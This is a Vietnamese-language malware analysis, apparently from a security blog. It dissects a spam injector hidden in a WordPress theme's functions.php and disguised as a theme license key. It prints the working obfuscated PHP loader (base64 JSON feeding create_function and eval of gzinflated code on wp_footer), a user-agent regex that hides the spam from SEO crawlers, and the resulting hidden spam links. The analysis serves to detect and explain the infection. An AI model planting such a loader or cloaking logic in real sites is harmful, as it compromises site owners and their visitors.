Wordpress Spam Injector Fake License Key

Một khách hàng của chúng tôi đã báo cáo một số URL spam lạ được chèn trên trang web WordPress của họ và sau khi điều tra, hóa ra tin tặc đã che giấu phần mềm độc hại của trình tiêm spam được mã hóa trong tệp chủ đề sau: /wp-content/theme/themevc/functions.php

Tin tặc đã định dạng trình tiêm mã hóa để trông giống như License Key theme đang cố gắng đánh lạc hướng khỏi nghi ngờ mã này và tìm phần mềm độc hại:

/**
 * Theme personal token soft descriptor.
 */
function theme_personal_token() {
	// Your personal token key #00118
	$token = <<<KEY
eyJsaWNlbnNlIjoiY3JlYXRlX2Z1bmN0aW9uIiwiYWNjb3VudCI6IiR4IiwidGhlbWUiOiJldmFs
KFwiPz5cIi5nemluZmxhdGUoYmFzZTY0X2RlY29kZSgkeCkpKTsiLCJ1cGRhdGUiOiJiWkY3YzZK
SUZNV1wvaXV0UWcxYXlHdkU5eG14RUVCXC9CRnhBbGxrVzEwa2hMODdDN0llcVE3NzQ0czdzMTJk
MFwvNzdtbjd2MmRleFwvXC9pTndveFwvbmRJdzBEeTRiNzBJYUZ3eFVGRGdZTUZuYUF3a2J0YjUz
...
ZlBsemhjNHZNNXlpNFlkdk5SU0JGRFlmQU43R2lJWXdZN0dEcnMyK1wvdGRyc1ZuVHY1cDh3UFN2
eGpHVHp4blkrUFhcL1phODVtbWJcL2lJM3hhXC9mdjFISEl4ZVpHMlRkXC9MYlRUNEFQc3h2XC94
MUU2eTlIY1wvMkhjZHBUNVN3TTUzUnRSRzd1Mnd0S3Ywd3VcL2RcL0FUaGJzczg3OHlQcXJsd0Ur
STJyRkVRNkJEVzNMUVRpYmlqT0laejlNNEg4YTk1eFQ3RHl6TUw1ZHpybVwvcVQ1RFAwbUtXZUNQ
UHdFPSJ9
KEY;
	if( $token = json_decode( base64_decode( $token ), true ) ) {
		$token['license'] = $token['license']( $token['account'], $token['theme'] );
		$token['license']( $token['update'] );
	}
}
add_action( 'wp_footer', 'theme_personal_token' );

Mã được chèn chứa một vài lớp mã hóa để tiếp tục làm xáo trộn nó khỏi sự phát hiện, nhưng chúng ta có thể bắt đầu bằng cách giải mã văn bản được mã hóa base64 trong biến $ token :

{"license":"create_function","account":"$x","theme":"eval(\"?>\".gzinflate(base64_decode($x)));","update":"bZF7c6JIFMW\/iutQg1ayGvE9xmxEEB\/BFxAllkW10khL87C7IeqQ7744s7s12d0\/77mn7v2dex\/\/iNwox\/ndIw0Dy4b70IaFwxUFDgYMFnaAwkbtb53Hry+7HVUP0lx4nagtPB4IRHPoKhp5WgUfpso0WEwmpNG8zDzQjNv6UDhLZ+iY1VmtIpPVsG43kDR8d+vjiUJG7eVUqRwNJYjkPdbvjn2g...skipped...\/LbTT4APsxv\/x1E6y9Hc\/2HcdpT5SwM53RtRG7u2wtKv0wu\/d\/AThbss878yPqrlwE+I2rFEQ6BDW3LQTibijOIZz9M4H8a95xT7DyzML5dzrm\/qT5DP0mKWeCPPwE="}

Như được hiển thị bởi nội dung được giải mã ở trên, chúng ta có thể thấy rằng hacker vẫn đang cố gắng ngụy trang phần mềm độc hại như một loại khóa cấp phép cho một chủ đề.

Câu lệnh if có điều kiện này cũng đã kiểm tra các tác nhân người dùng, hiển thị các URL spam cho bất kỳ và tất cả các tác nhân / công cụ tìm kiếm khác ngoại trừ các tác nhân được hiển thị bên dưới. Nó đã cố gắng ẩn nó khỏi một số công cụ phân tích liên kết dựa trên web vì nó có thể được lưu trữ bởi các công cụ đó và khách hàng có thể được thông báo:

if(!preg_match('#ia_archiver|Baidu|MJ12|Ezooms|Solomono|roger|Linkpad|Semrush|prodvigator|Survey|Alexi|Xenu|Ahrefs|serpstat|Yandex#i', $k)

Tải trọng được giải mã cuối cùng với các liên kết ẩn như nó sẽ xuất hiện trong nguồn HTML:

<a href="hps://credit-10[.]com/no/komplett-bank-logg-inn/" style="position:absolute;left:-9998px;">komplett bank min side</a><a href="hxxp://emporium[.]com.ua/answear" style="position:absolute;left:-9998px;">промокод ансвер</a><a href="hxxps://evehealth[.]ru/promokody/shops/promokody-onetwotrip" style="position:absolute;left:-9998px;">onetwotrip промокод</a><a href="hxxps://promocodius[.]com/us/shops/iherb" style="position:absolute;left:-9998px;">iherb coupon</a>

Các liên kết được mã hóa cứng bên trong phần mềm độc hại này, nhưng trên các trang web khác nhau, chúng có thể khác nhau. Mặc dù vậy, tên miền của các trang web virus vẫn giống nhau.